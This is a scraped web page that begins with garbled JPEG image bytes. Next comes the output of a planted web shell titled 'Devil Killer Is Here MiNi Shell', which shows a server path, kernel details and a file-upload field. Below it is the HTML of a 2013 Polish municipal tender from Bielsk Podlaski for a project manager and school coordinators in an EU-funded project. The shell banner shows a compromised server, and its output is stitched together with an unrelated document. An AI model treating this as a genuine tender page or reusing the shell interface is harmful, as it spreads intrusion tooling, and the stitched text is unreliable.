JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130926/196835-N-2013.html

<p class="kh_header"><b>Bielsk Podlaski: Pełnienie funkcji kierownika projektu (część I) oraz koordynatorów szkolnych (część II,III i IV) w projekcie pn. Bielskie Gimnazja   - pewny start  i dobra przyszłość</b><br>
<b>Numer ogłoszenia: 196835 - 2013; data zamieszczenia: 26.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Bielsk Podlaski , ul. Kopernika 1, 17-100 Bielsk Podlaski, woj. podlaskie, tel. 0-85 73 18 100, faks 0-85 73 18 150.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bielsk-podlaski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji kierownika projektu (część I) oraz koordynatorów szkolnych (część II,III i IV) w projekcie pn. Bielskie Gimnazja   - pewny start  i dobra przyszłość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot umowy obejmuje prace dotyczące: 
- pełnienia funkcji Kierownika Projektu (część I) 
oraz 
- pełnienia funkcji koordynatora w gimnazjum Nr 1 im. Niepodległości Polski (część II)
- pełnienia funkcji koordynatora w gimnazjum Nr 2 (część III)
- pełnienia funkcji koordynatora w gimnazjum Nr 3 (część IV)
w projekcie pn. Bielskie Gimnazja   - pewny start  i dobra przyszłość - projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Głównym celem projektu jest wyrównanie szans edukacyjnych oraz zmniejszenie dysproporcji w zdobywaniu wiedzy i rozwoju zainteresowań 303 uczniów i 257 uczennic z 3 Gimnazjów w Bielsku Podlaskim poprzez realizację do 30.06.2015 programów rozwojowych szkół. 
Do podstawowych obowiązków Kierownika Projektu będzie należeć nadzór nad prawidłową realizacją  projektu zgodnie z harmonogramem i budżetem projektu, w tym w szczególności:
1)koordynowanie prac zespołu projektowego,
2)nadzorowanie i koordynacja prac wszystkich osób zaangażowanych w realizację projektu,
3)opracowanie zakresów czynności dla osób zespołu projektowego,
4)prowadzenie spotkań zespołu projektowego oraz podejmowanie kluczowych decyzji,
5)nadzór nad przestrzeganiem zasad równości szans kobiet i mężczyzn,
6)współpraca z dyrekcją i Koordynatorami Szkolnymi w zakresie realizacji zadań merytorycznych w poszczególnych szkołach; 
7)przygotowania i koordynacji korespondencji związanej z projektem,
8)nadzorowanie terminowego sporządzania wniosków o płatność wraz z zebraniem wszystkich załączników,
9)nadzór nad wydatkami projektu,
10)planowanie działań w projekcie i nadzór nad wywiązaniem się ze wskaźników przyjętych w projekcie,
11)wprowadzania zmian do projektu, jeśli zajdzie taka potrzeba w trakcie realizacji projektu (po uzgodnieniu z IP)
12)nadzór na działaniami dotyczącymi promocji projektu i rekrutacji uczestników;
13)koordynowanie działań w zakresie monitorowania projektu i ewaluacji w projekcie,
14)nadzór nad należytym prowadzeniem i archiwizowaniem dokumentacji związanej z realizacją projektu.
15)dbanie o przepływ informacji w ramach struktury wewnętrznej i zewnętrznej.
16)współpraca i reprezentowanie Wnioskodawcy przed Instytucją Pośredniczącą, 
17)koordynowanie dokonywania zakupów i zamawiania usług w ramach projektu,
18)poddania się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu, w tym obecność podczas kontroli projektu, również po jego zakończeniu   zgodnie z Zasadami prowadzenia kontroli w PO KL. 
19)wykonywania innych zadań wynikających z potrzeby prawidłowego zrealizowania projektu i umowy o dofinansowanie projektu.
Szacowny czas pracy- śr. 70 godzin w miesiącu. 
Współpraca w oparciu o umowę cywilno-prawną .
Do podstawowych obowiązków koordynatorów szkolnych należeć będzie:
1)koordynacja działań projektu realizowanych na terenie szkoły 
2)udział w pracach zespołu projektowego,
3)współpraca z kierownikiem projektu, specjalistą ds. rozliczeń i sprawozdawczości w zakresie realizacji projektu zgodnie z budżetem i harmonogramem, 
4)nadzorowanie i rekrutacja uczestników do projektu w szkole,
5)monitorowanie realizacji zajęć w ramach projektu w szkole,
6)nadzór nad działaniami dotyczącymi promocji projektu w szkole, w tym: umieszczanie informacji o realizowanym projekcie na szkolnej stronie internetowej, przekazywanie niezbędnych materiałów promocyjnych do umieszczenia na utworzonej specjalnie stronie do projektu, dbanie o odpowiednie oznakowanie sal dydaktycznych, w których będą odbywały się zajęcia projektowe i wszelkich pomocy dydaktycznych oraz sprzętu zakupionego 
w ramach projektu do realizacji zajęć  logotypami EFS, POKL oraz nazwą projektu, 
7)dbanie o należyty i poprawny przepływ informacji w ramach struktury zewnętrznej  w ramach zespołu projektu oraz kadry merytorycznej zaangażowanej do prowadzenia zajęć w szkole, 
8)nadzór nad prawidłowością prowadzonej dokumentacji dotyczącej zajęć w szkole: merytorycznej (w tym w szczególności harmonogramów, dzienników zajęć, materiałów dydaktycznych) i finansowej (w tym w szczególności umów, kart czasu pracy, rachunków), 
9)weryfikacja poprawnego wypełnienia rachunków przedkładanych przez osoby prowadzące zajęcia projektowe,
10)prowadzenie własnej ewidencji czasu pracy,
11)przedkładanie Kierownikowi Projektu zestawienia zrealizowanych zajęć i godzin w ramach projektu przez poszczególną szkołę według wzoru, 
12)informowanie kierownika projektu i/lub specjalistę ds. rozliczeń i sprawozdawczości 
o ewentualnych problemach i zakłóceniach w przebiegu realizacji zajęć bądź innych zaistniałych sytuacjach, które miałyby wpływ na nieprawidłową realizację całego projektu,
13)nadzór nad przekazaniem zakupionego sprzętu, pakietów edukacyjnych, pomocy dydaktycznych i materiałów biurowych do zajęć zakupionych w ramach projektu,
14)nadzór nad przechowywaniem i archiwizowaniem dokumentacji projektowej w szkole,
15)wykonywania innych zajęć wynikających z potrzeb prawidłowego zrealizowania projektu.
Osoby, które zostaną wyłonione w postępowaniu na kierownika projektu i koordynatorów szkolnych będą zobowiązane do podpisani oświadczenia wg Załącznika nr 5.
Usługę należy wykonać osobiście..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca złoży oświadczenie zgodne załącznikiem Nr 3 oraz wykaże, że dysponuje jedną osobą na każdą część zamówienia o następujących kwalifikacjach:
Część I (kierownik projektu)
- wykształcenie wyższe magisterskie z przygotowanie pedagogicznym,
- doświadczenie w edukacji: minimum 3 lata doświadczenia pracy w szkole/placówce 
  oświatowej, w tym 2 lata na stanowisku kierowniczym
-dyspozycyjność w trakcie realizacji projektu
Część II (koordynator projektu w Gimnazjum Nr 1im. Niepodległości Polski)
- wykształcenie wyższe magisterskie z przygotowanie pedagogicznym,
- minimum stopień nauczyciela mianowanego,
- umiejętność pracy w zespole,
- dyspozycyjność w trakcie realizacji projektu.
Część III (koordynator projektu w Gimnazjum Nr 2 przy Zespole Szkół im. A. Mickiewicza
- wykształcenie wyższe magisterskie z przygotowanie pedagogicznym,
- minimum stopień nauczyciela mianowanego,
- umiejętność pracy w zespole,
- dyspozycyjność w trakcie realizacji projektu.
Część IV (koordynator projektu w Gimnazjum Nr 3 przy Zespole Szkół z Dodatkową Nauką Języka Białoruskiego im. J. Kostycewicza
- wykształcenie wyższe magisterskie z przygotowanie pedagogicznym,
- minimum stopień nauczyciela mianowanego,
- umiejętność pracy w zespole,
- dyspozycyjność w trakcie realizacji projektu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy wg załącznika Nr 1 do SIWZ
2.Pełnomocnictwo - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy została złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bielsk-podlaski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Bielsk Podlaski Referat Inwestycji i Zamówień Publicznych, ul. Kopernika 1,  17-100 Bielsk Podlaski, pokój nr 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2013 godzina 10:00, miejsce: Urząd Miasta Bielsk Podlaski, Biuro podawcze, ul. Kopernika 1,  17-100 Bielsk Podlaski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji kierownika projektu (część I) w projekcie pn. Bielskie Gimnazja   - pewny start  i dobra przyszłość.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do podstawowych obowiązków Kierownika Projektu będzie należeć nadzór nad prawidłową realizacją  projektu zgodnie z harmonogramem i budżetem projektu, w tym w szczególności:
1)koordynowanie prac zespołu projektowego,
2)nadzorowanie i koordynacja prac wszystkich osób zaangażowanych w realizację projektu,
3)opracowanie zakresów czynności dla osób zespołu projektowego,
4)prowadzenie spotkań zespołu projektowego oraz podejmowanie kluczowych decyzji,
5)nadzór nad przestrzeganiem zasad równości szans kobiet i mężczyzn,
6)współpraca z dyrekcją i Koordynatorami Szkolnymi w zakresie realizacji zadań merytorycznych w poszczególnych szkołach; 
7)przygotowania i koordynacji korespondencji związanej z projektem,
8)nadzorowanie terminowego sporządzania wniosków o płatność wraz z zebraniem wszystkich załączników,
9)nadzór nad wydatkami projektu,
10)planowanie działań w projekcie i nadzór nad wywiązaniem się ze wskaźników przyjętych w projekcie,
11)wprowadzania zmian do projektu, jeśli zajdzie taka potrzeba w trakcie realizacji projektu (po uzgodnieniu z IP)
12)nadzór na działaniami dotyczącymi promocji projektu i rekrutacji uczestników;
13)koordynowanie działań w zakresie monitorowania projektu i ewaluacji w projekcie,
14)nadzór nad należytym prowadzeniem i archiwizowaniem dokumentacji związanej z realizacją projektu.
15)dbanie o przepływ informacji w ramach struktury wewnętrznej i zewnętrznej.
16)współpraca i reprezentowanie Wnioskodawcy przed Instytucją Pośredniczącą, 
17)koordynowanie dokonywania zakupów i zamawiania usług w ramach projektu,
18)poddania się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu, w tym obecność podczas kontroli projektu, również po jego zakończeniu   zgodnie z Zasadami prowadzenia kontroli w PO KL. 
19)wykonywania innych zadań wynikających z potrzeby prawidłowego zrealizowania projektu i umowy o dofinansowanie projektu.
Szacowny czas pracy- śr. 70 godzin w miesiącu. 
Współpraca w oparciu o umowę cywilno-prawną ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Koordynator szkolny (część II) w projekcie pn. Bielskie Gimnazja   - pewny start  i dobra przyszłość.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do podstawowych obowiązków koordynatorów szkolnych należeć będzie:
1)	koordynacja działań projektu realizowanych na terenie szkoły 
2)	udział w pracach zespołu projektowego,
3)	współpraca z kierownikiem projektu, specjalistą ds. rozliczeń i sprawozdawczości w zakresie realizacji projektu zgodnie z budżetem i harmonogramem, 
4)	nadzorowanie i rekrutacja uczestników do projektu w szkole,
5)	monitorowanie realizacji zajęć w ramach projektu w szkole,
6)	nadzór nad działaniami dotyczącymi promocji projektu w szkole, w tym: umieszczanie informacji o realizowanym projekcie na szkolnej stronie internetowej, przekazywanie niezbędnych materiałów promocyjnych do umieszczenia na utworzonej specjalnie stronie do projektu, dbanie o odpowiednie oznakowanie sal dydaktycznych, w których będą odbywały się zajęcia projektowe i wszelkich pomocy dydaktycznych oraz sprzętu zakupionego 
w ramach projektu do realizacji zajęć  logotypami EFS, POKL oraz nazwą projektu, 
7)	dbanie o należyty i poprawny przepływ informacji w ramach struktury zewnętrznej  w ramach zespołu projektu oraz kadry merytorycznej zaangażowanej do prowadzenia zajęć w szkole, 
8)	nadzór nad prawidłowością prowadzonej dokumentacji dotyczącej zajęć w szkole: merytorycznej (w tym w szczególności harmonogramów, dzienników zajęć, materiałów dydaktycznych) i finansowej (w tym w szczególności umów, kart czasu pracy, rachunków), 
9)	weryfikacja poprawnego wypełnienia rachunków przedkładanych przez osoby prowadzące zajęcia projektowe,
10)	prowadzenie własnej ewidencji czasu pracy,
11)	przedkładanie Kierownikowi Projektu zestawienia zrealizowanych zajęć i godzin w ramach projektu przez poszczególną szkołę według wzoru, 
12)	informowanie kierownika projektu i/lub specjalistę ds. rozliczeń i sprawozdawczości 
o ewentualnych problemach i zakłóceniach w przebiegu realizacji zajęć bądź innych zaistniałych sytuacjach, które miałyby wpływ na nieprawidłową realizację całego projektu,
13)	nadzór nad przekazaniem zakupionego sprzętu, pakietów edukacyjnych, pomocy dydaktycznych i materiałów biurowych do zajęć zakupionych w ramach projektu,
14)	nadzór nad przechowywaniem i archiwizowaniem dokumentacji projektowej w szkole,
15)	wykonywania innych zajęć wynikających z potrzeb prawidłowego zrealizowania projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> koordynator szkolny (część III ) w projekcie pn. Bielskie Gimnazja   - pewny start  i dobra przyszłość.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do podstawowych obowiązków koordynatorów szkolnych należeć będzie:
1)	koordynacja działań projektu realizowanych na terenie szkoły 
2)	udział w pracach zespołu projektowego,
3)	współpraca z kierownikiem projektu, specjalistą ds. rozliczeń i sprawozdawczości w zakresie realizacji projektu zgodnie z budżetem i harmonogramem, 
4)	nadzorowanie i rekrutacja uczestników do projektu w szkole,
5)	monitorowanie realizacji zajęć w ramach projektu w szkole,
6)	nadzór nad działaniami dotyczącymi promocji projektu w szkole, w tym: umieszczanie informacji o realizowanym projekcie na szkolnej stronie internetowej, przekazywanie niezbędnych materiałów promocyjnych do umieszczenia na utworzonej specjalnie stronie do projektu, dbanie o odpowiednie oznakowanie sal dydaktycznych, w których będą odbywały się zajęcia projektowe i wszelkich pomocy dydaktycznych oraz sprzętu zakupionego 
w ramach projektu do realizacji zajęć  logotypami EFS, POKL oraz nazwą projektu, 
7)	dbanie o należyty i poprawny przepływ informacji w ramach struktury zewnętrznej  w ramach zespołu projektu oraz kadry merytorycznej zaangażowanej do prowadzenia zajęć w szkole, 
8)	nadzór nad prawidłowością prowadzonej dokumentacji dotyczącej zajęć w szkole: merytorycznej (w tym w szczególności harmonogramów, dzienników zajęć, materiałów dydaktycznych) i finansowej (w tym w szczególności umów, kart czasu pracy, rachunków), 
9)	weryfikacja poprawnego wypełnienia rachunków przedkładanych przez osoby prowadzące zajęcia projektowe,
10)	prowadzenie własnej ewidencji czasu pracy,
11)	przedkładanie Kierownikowi Projektu zestawienia zrealizowanych zajęć i godzin w ramach projektu przez poszczególną szkołę według wzoru, 
12)	informowanie kierownika projektu i/lub specjalistę ds. rozliczeń i sprawozdawczości 
o ewentualnych problemach i zakłóceniach w przebiegu realizacji zajęć bądź innych zaistniałych sytuacjach, które miałyby wpływ na nieprawidłową realizację całego projektu,
13)	nadzór nad przekazaniem zakupionego sprzętu, pakietów edukacyjnych, pomocy dydaktycznych i materiałów biurowych do zajęć zakupionych w ramach projektu,
14)	nadzór nad przechowywaniem i archiwizowaniem dokumentacji projektowej w szkole,
15)	wykonywania innych zajęć wynikających z potrzeb prawidłowego zrealizowania projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Koordynator szkolny (część IV) w projekcie pn. Bielskie Gimnazja   - pewny start  i dobra przyszłość.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do podstawowych obowiązków koordynatorów szkolnych należeć będzie:
1)koordynacja działań projektu realizowanych na terenie szkoły 
2)udział w pracach zespołu projektowego,
3)współpraca z kierownikiem projektu, specjalistą ds. rozliczeń i sprawozdawczości w zakresie realizacji projektu zgodnie z budżetem i harmonogramem, 
4)nadzorowanie i rekrutacja uczestników do projektu w szkole,
5)monitorowanie realizacji zajęć w ramach projektu w szkole,
6)nadzór nad działaniami dotyczącymi promocji projektu w szkole, w tym: umieszczanie informacji o realizowanym projekcie na szkolnej stronie internetowej, przekazywanie niezbędnych materiałów promocyjnych do umieszczenia na utworzonej specjalnie stronie do projektu, dbanie o odpowiednie oznakowanie sal dydaktycznych, w których będą odbywały się zajęcia projektowe i wszelkich pomocy dydaktycznych oraz sprzętu zakupionego 
w ramach projektu do realizacji zajęć  logotypami EFS, POKL oraz nazwą projektu, 
7)dbanie o należyty i poprawny przepływ informacji w ramach struktury zewnętrznej  w ramach zespołu projektu oraz kadry merytorycznej zaangażowanej do prowadzenia zajęć w szkole, 
8)nadzór nad prawidłowością prowadzonej dokumentacji dotyczącej zajęć w szkole: merytorycznej (w tym w szczególności harmonogramów, dzienników zajęć, materiałów dydaktycznych) i finansowej (w tym w szczególności umów, kart czasu pracy, rachunków), 
9)weryfikacja poprawnego wypełnienia rachunków przedkładanych przez osoby prowadzące zajęcia projektowe,
10)prowadzenie własnej ewidencji czasu pracy,
11)przedkładanie Kierownikowi Projektu zestawienia zrealizowanych zajęć i godzin w ramach projektu przez poszczególną szkołę według wzoru, 
12)informowanie kierownika projektu i/lub specjalistę ds. rozliczeń i sprawozdawczości 
